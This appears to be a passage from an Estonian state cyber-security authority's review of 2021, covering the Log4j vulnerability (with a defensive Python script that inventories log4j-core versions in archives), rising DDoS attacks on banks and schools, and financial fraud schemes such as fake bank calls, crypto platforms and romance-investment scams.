Logging can be compared to a smart camera on the main street and square in a city. It gives the city authorities the opportunity to check whether the Christmas tree is still standing, whether the streets are covered in snow, or whether city services are working as they should. In addition, it helps to analyse how people behave there: whether they use the existing sidewalks and crosswalks or cross the streets in the wrong places. If there is an accident in the area, the police can find out the circumstances of the accident by looking at the recording. This is essentially how logging works.

However, if a vulnerability of the camera allows the information systems and databases of the city government to be taken over, the situation is equivalent to the critical vulnerability of Log4j, which gives criminals power not only over this particular function (camera) but the entire infrastructure.

HOW IS THE SECURITY VULNERABILITY EXPLOITED?

Although a tsunami was expected after the weakness became apparent and people started getting ready to board Noah’s Ark, the end of the IT world has not yet come. The impact of the vulnerability may not become apparent for years to come. At this time, we do not know if and where the attackers intruded before the security updates were installed.

Attackers could exploit the vulnerability by sending a message in a specific format and an additional reference to malware located somewhere on a third server to a vulnerable server, device, or system that could be accessed from the Internet. The vulnerable server read the command from the message, Log4j searched for the malware, downloaded it, and ran it. It was as if a person were knocking themselves out. Depending on the nature of the malware, it may give a third party access to the device.

The security vulnerability primarily affects companies and authorities, as it is potentially possible to gain access to their systems. Once it is exploited by criminals and they are able to install malware on popular services, it will also affect end users.

As at the end of 2021, there has been no mass exploitation of the Log4j vulnerability in Estonia or in the world, but as we wrote, its impact could still be revealed. Criminals are currently actively monitoring online services to find systems that have not been addressed. Vulnerable devices are also being searched for in Estonia.

SITUATION IN ESTONIA

In the days following the disclosure of the security vulnerability, CERT-EE identified Estonian companies and authorities that were at risk due to the vulnerability and asked them to update or close the respective services. CERT-EE will continue to look for new cases, as not all service users have yet patched the vulnerability. In addition, there is not a security patch for all services yet.

RIA has not received reports of attacks with serious consequences resulting from the Log4j vulnerability. However, malware has been installed in Estonia on computers through the vulnerability, which mines cryptocurrency. Because this malware slows down services, these cryptocurrency miners are quickly found and removed.

There have been reports abroad that attempts have been made to prepare for ransomware attacks through the vulnerability. If criminals have launched malware on a system that is difficult to detect right away, data leaks can occur much later.

What did RIA do?

- On 10 December, we informed the Estonian public about the security vulnerability and its impact.
- On 13 and 19 December, we sent additional information about the security vulnerability to the public sector and vital service providers.
- On 22 December, we published a post on the RIA blog focusing on the security vulnerability.
- We identified RIA services that are affected by the vulnerability. We installed updates or countermeasures.
- CERT-EE monitors what is happening in Estonian cyberspace 24/7 and searches for attack attempts.

WHAT SHOULD I DO?

First, inspect services built on the Java platform that are part of your service portfolio. Check for updates to the products you use. If there are updates, install them as soon as possible because they address a critical security vulnerability. This is especially important for systems that are available online.

However, this does not mean you are safe. On 28 December, a smaller vulnerability was discovered in the next version of Log4j. IT professionals need to keep a close eye on what is going on with this vulnerability and be prepared that the update needs to be updated as well. It should also be borne in mind that a security patch has not yet been developed for all services. The vulnerability may never materialise if the vulnerable service is not open to the Internet or devices are prevented from accessing the Internet. ●
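The first step recommended above, finding every copy of Log4j in your service portfolio, is harder than it looks because application archives (WAR/EAR files) often bundle their own copy of the library. The inventory script below is an added example, not RIA's or the Log4j project's code; it assumes Maven-packaged log4j-core jars (which carry a pom.properties file), and its minimum acceptable version is a placeholder to be taken from the advisory current at scan time, since the text notes that the first fix itself had to be updated.

```python
"""Inventory log4j-core copies under a directory, including jars nested in WAR/EAR files.
Added example (not RIA code); assumes Maven-packaged jars, which carry pom.properties."""
import io
import os
import re
import tempfile
import zipfile
from typing import Iterator, List, Optional, Tuple

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Maven-packaged log4j-core jars carry this file with a "version=" line.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# PLACEHOLDER: take the real minimum from the advisory current at scan time.
ASSUMED_MINIMUM = "2.17.1"

Finding = Tuple[str, Optional[str]]   # (location, version or None if unreadable)

def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); a suffix such as '-beta9' is ignored."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    return tuple(int(p) for p in m.group(0).split(".")) if m else ()

def scan_archive(zf: zipfile.ZipFile, location: str) -> Iterator[Finding]:
    """Report this archive if it is log4j-core, then recurse into nested archives."""
    names = zf.namelist()
    if POM_PROPERTIES in names:
        props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
        m = re.search(r"^version=(\S+)", props, re.MULTILINE)
        yield (location, m.group(1) if m else None)
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue                     # member named *.jar but not a zip
            with inner:
                yield from scan_archive(inner, f"{location} -> {name}")

def scan_path(root: str) -> List[Finding]:
    """Walk a directory tree and collect every log4j-core copy found."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    with zipfile.ZipFile(path) as zf:
                        findings.extend(scan_archive(zf, path))
                except zipfile.BadZipFile:
                    continue
    return findings

def needs_attention(version: Optional[str], minimum: str = ASSUMED_MINIMUM) -> bool:
    """Flag copies older than the assumed minimum, or whose version is unknown."""
    return version is None or parse_version(version) < parse_version(minimum)

def _log4j_core_jar(version: str) -> bytes:
    """Constructed stand-in for a log4j-core jar: only the pom.properties file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"artifactId=log4j-core\nversion={version}\n")
    return buf.getvalue()

def build_sample_tree(root: str) -> None:
    """Constructed sample data: a current jar on disk and an old jar nested in a WAR."""
    with open(os.path.join(root, "log4j-core-new.jar"), "wb") as fh:
        fh.write(_log4j_core_jar("2.17.1"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-old.jar", _log4j_core_jar("2.14.1"))
    with open(os.path.join(root, "intranet.war"), "wb") as fh:
        fh.write(war.getvalue())

def demo() -> List[Tuple[str, Optional[str], bool]]:
    """Scan the constructed tree; returns (location, version, needs_attention) rows."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        rows = []
        for location, version in sorted(scan_path(root)):
            top, *nested = location.split(" -> ")
            rel = " -> ".join([os.path.relpath(top, root)] + nested)
            rows.append((rel, version, needs_attention(version)))
        return rows
```

Run `scan_path()` against a real deployment directory to get the same rows for your own services; the nested copy inside the WAR is exactly the kind that a check of installed packages alone would miss.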
In 2021, There Were 50% More DDoS Attacks Than Last Year

Last year, we registered 47 distributed denial-of-service attacks (DDoS), which is 50% more than in 2020. Until the spring, ransom denial-of-service attacks targeted companies, but in the autumn, schools and learning environments became the victims.

One cold afternoon in February, a threatening e-mail was sent to a commercial bank operating in Estonia. Transfer two Bitcoins (worth nearly 56,000 euros at the time) to the account specified in the e-mail, or we will launch a massive denial-of-service attack against your business. The bank had received a similar e-mail and undergone a so-called sample attack four months prior.

Usually, the victim is given more time to react. This time, however, the attack started ten minutes later. At one point, neither Internet banking, card payments, nor the internal services of the bank were available. Although the attack lasted with varying intensity until the evening of the same day, and its effects were felt by both the customers and employees of the bank, the protection measures helped to prevent the worst.

RANSOM DDOS ATTACKS ENDED

Such ransom denial-of-service attacks returned to Estonian cyberspace in the autumn of 2020 and continued in the beginning of 2021. The targets were a number of companies in the technology and financial sectors that have a lot to lose from the disruption of e-services, but which also have above-average levels of cyber security. The victims who were attacked in the autumn were attacked again a few months later. The attacks were mostly based on intimidation, but there were exceptions. For example, a blackmailer who organised a denial-of-service attack wrote that they needed money for their daughter’s surgery and had run out of other ideas to earn the money they needed.

The methods, scale, and impact of the attacks varied, but the victims were united by the decision not to submit to extortion. The fact that the business plan of the criminals did not work was probably the reason why ransom denial-of-service attacks almost disappeared after the first quarter.

Figure: The number of DDoS attacks is growing. From the summer of 2020, we also collect automatic notifications of denial-of-service attacks without a significant impact, which are clearly on the rise. (Chart: monthly number of attacks from May 2020 to December 2021, on a scale of 0 to 50.)

ATTACKS ON SCHOOLS

They were replaced by a new problem: attacks on schools and the Tahvel and Moodle learning information systems. These attackers were not motivated by the desire to get rich – as far as we know, there have been no attacks on educational institutions that involved a financial demand. Instead, we suspect that students in the same school who had not prepared for a test or did not want to go to school were behind the attacks. The attacks on schools or learning information systems usually took place during school hours. They disappeared during weekends and school breaks, and returned when school began again.

In September, we received reports of denial-of-service attacks on schools or learning environments almost every day. Some of them did not have a significant impact, but some of the attacks disrupted the daily work of the schools: it was not possible to add or view lesson plans, grades, absences, and teaching materials, or to take tests. There were also attacks that affected other authorities that used the same network or name servers in addition to the target school.

A young person might think that by ordering an attack on their school, they could avoid taking a test or could skip school without anyone noticing. An adult, however, knows that this is not the case.

DEVICES LOCATED IN ESTONIA ARE ALSO USED FOR ATTACKS

In most cases, foreign devices are used in denial-of-service attacks against our e-services, but when analysing incidents, we have also found Estonian IP addresses. Their owners may not be aware that their router, printer, or security camera is infected with malware, is connected to a botnet, and attempts to ‘take down’ their home bank or the school of their children. To prevent safe-looking devices from becoming a dangerous tool in the hands of cybercriminals, always make sure to update their software. ●
Financial Fraud Has Become More Diverse

Last year, we received 20% more reports of fraud than the year before about incidents in which Estonian people and companies lost money. The Information System Authority (RIA) only sees the tip of the iceberg, because victims of financial fraud turn primarily to the police.

While attempts are still being made to defraud companies of money with various invoice frauds, last year stood out with the number of frauds against individuals. This may be due to people having more money on their account as a result of the pension reform and the pandemic situation, as well as the growing interest in cryptocurrencies. At the same time, the fraudsters are evolving rapidly and successfully using psychological manipulation techniques. In addition, they have always been able to reap the benefits of changing circumstances.

FRAUDULENT CALLS FROM THE BANK AND THE POLICE

Many of the reports we receive about financial fraud against individuals still involve fraudulent calls on behalf of a bank. The caller is usually a Russian-speaking person, but at the end of the year, there was also a trend where the conversation was started in Estonian and only then handed over to a Russian-speaking ‘customer service representative’. The purpose of the calls is to find out the PINs of the person and use them to clear the bank account.

Although both the police and the Estonian Banking Association have worked hard to raise awareness of the problem (see, for example, the campaign page eiaitah.ee) and it has also been widely covered in the media, there are still many people who believe the callers and end up losing their savings. The figures speak for themselves: according to the police, in the first ten months of the year, people lost 2.8 million euros in this way. The fraudsters were most active during autumn.

At the end of 2021, there was also a wave of calls imitating the police: the caller claims to be from the Estonian police and informs the person that a large loan has been taken on their behalf, or asks for information about a third party and then informs the person that the bank account of the person has been hacked. The purpose of the call is to phish the personal identification code and other data that can be used to carry out frauds.

The fraudsters try various techniques to increase their credibility, such as mentioning their police token number. Behind these calls is an internationally organised network whose call centres make thousands of calls a day and constantly seek to make them more credible to generate revenue.

CRYPTOCURRENCY FRAUDS ARE A RISING TREND

Various frauds related to cryptocurrencies, the losses of which ranged from a few hundred euros to almost 100,000 euros, were a growing trend last year. The most typical were cases where a person had created an account and started operating on a cryptocurrency trading platform, but later found that it was no longer possible to withdraw the money. It often turned out to be a fake platform − a temporary environment specially created by criminals to entice people to make transactions there. After a while, the platform was closed and the money was stolen.

It is relatively easy to carry out this type of fraud scheme, as the regulation of cryptocurrencies is still under development all over the world (a bill regulating the respective field in Estonia is expected to be approved this spring). So far, almost anyone can create or buy a trading environment for cryptocurrencies, buy fake users and followers, and advertise it on influential social media channels. While the initial recommendation before purchasing any cryptocurrency or joining any environment is always to do a thorough background check, it may not be enough – fake platforms may have fake user reviews, and negative feedback from deceived customers may not reach the forums until it is too late. In addition, there are also criminals following the forums who rush ‘to help’ those who have lost money and direct them to new phishing sites or fake environments.

In addition to fake platforms, we also received reports of criminals breaking into a crypto wallet of a person (the application where crypto assets were stored) and stealing the contents. The average reported loss was around a few thousand euros. Well-known applications, such as MetaMask, are not inherently unsafe, but they are vulnerable to common threats such as weak passwords, security vulnerabilities in applications such as web browsers, or the user accidentally entering their own crypto keys on a phishing site. While in the case of banks, the responsibility of the bank for deposited money is very clearly regulated and depositors are protected by law, theft in the crypto world usually means the permanent loss of one’s assets.

Frauds also have indirect victims

In addition to direct financial loss, invoice fraud can also have indirect victims whose business or reputation may be temporarily damaged. In 2021, there was an example of a company in the medical sector whose name and details were used to send fake invoices to partners in the same field. This temporarily damaged the good name of the company and also caused delays in receiving payments, as partners no longer knew which invoices to trust and which not.

Upistic disappeared with the money of the investors

In the last two months of the year, we received reports about the environment upistic.com, which advertised itself as the leading provider of crypto investment services in Estonia and attracted investors from all over the world. However, the environment stopped working and investors, mostly foreigners, lost their money. In the cases reported to us, the damages ranged from a few hundred to a few thousand euros.

INVESTMENT ADVICE FROM TINDER?

Many of the frauds we found out about were linked to a specific scheme. In this scheme, victims meet the fraudster on a dating platform – often on Tinder or Facebook Dating. After some time, the ‘beautiful Asian girl’ or ‘young French man’ starts talking about investment opportunities that they have used to improve their lives and on which they have been advised by a ‘relative working in the finance field’.

The conversation was often not intrusive at all and the topic was casually mentioned while talking about their daily activities. These fraudsters often wait for the victims to become interested and start asking additional questions. Once they got to know each other more and some trust was established, the new acquaintance agreed to share their investment recommendations, helped create an account in a specially designed environment, and showed how the initial investment was earning good profit. Over time, they encouraged the victim to invest ever-increasing amounts of money. However, when the person wanted to take out the investment, it proved impossible. It was essentially an investment fraud, but instead of aggressive telephone sales, contact was made on a dating platform and the fraudster spent time getting to know the victim.

The story of one fraud

Martin is a successful middle-aged entrepreneur who works in the field of consulting and communicates with a large number of people in Estonia and abroad. One day, he received a Facebook friend request from a lady who introduced herself as a representative of the international fashion industry. She said she had been on holiday in Estonia and was looking for marketing contacts here. Her communication style was polite and professional. In addition, she sent Martin materials related to her professional work and was not in any way intrusive. The lady also talked about her background and achievements and sent pictures – nothing seemed suspicious.

After several weeks of communication, she mentioned her experience in crypto and her plans for specific transactions. As Martin was also interested in the field, he asked for more information and received references and links to various environments. Martin checked them and found no indications that the environments were fake.

Martin then decided to invest 1,000 euros in crypto, which started to make a profit, and initially, he was able to grow his investment. Encouraged by the positive experience, he made two additional investments.

At one point, however, Martin said his ‘intuition awoke’, and when he tried to transfer the earned money back to his crypto account, it failed. In total, Martin lost 8,000 euros. The police say there is not much hope of getting it back and Martin will have to take it as a lesson. As for money and investment, his advice is to be very careful with any new contacts and not to trust their advice, no matter how skilfully presented.

THERE WERE FEWER FAKE INVOICES THIS YEAR

2021 broke the record with two attempts to commit invoice fraud, the figures of which were unprecedented in Estonia. Fortunately, they remained only attempts. The largest of these took place in the early summer, when criminals began to monitor the e-mail exchange of a large Estonian company with a cooperation partner abroad. At the appropriate time, they intervened and presented fake invoices for a total of several million euros on behalf of the partner. The e-mail filter system of the company discovered the fraud fairly quickly and no losses were incurred. The Estonian company also did not find any signs of a break-in in its e-mail system, so it could be assumed that the mailbox of the cooperation partner located in Central Europe had been compromised.

The second case took place at the beginning of the year, when the attentive staff of a construction company was able to prevent a similar attempt to commit invoice fraud for 900,000 euros. Both of these cases show that appropriate protection measures and staff awareness of the most common scams pay off indeed.

There were some successful invoice frauds too in 2021. To our knowledge, the largest amount lost was 35,000 euros.

In addition to the way described above, where fraud is carried out by breaking into the system and hijacking the e-mail conversation, the classic CEO frauds are also still used. In December, a dozen companies informed us that their accountant had received a letter from the CEO or a member of the management board requesting an urgent transfer to a foreign bank account. In at least one case, the transfer was made and 15,000 euros reached the account of the fraudster. However, general awareness of this type of fraud has grown over the years and there are fewer cases of major financial losses. ●

Figure: An example of a classic CEO fraud.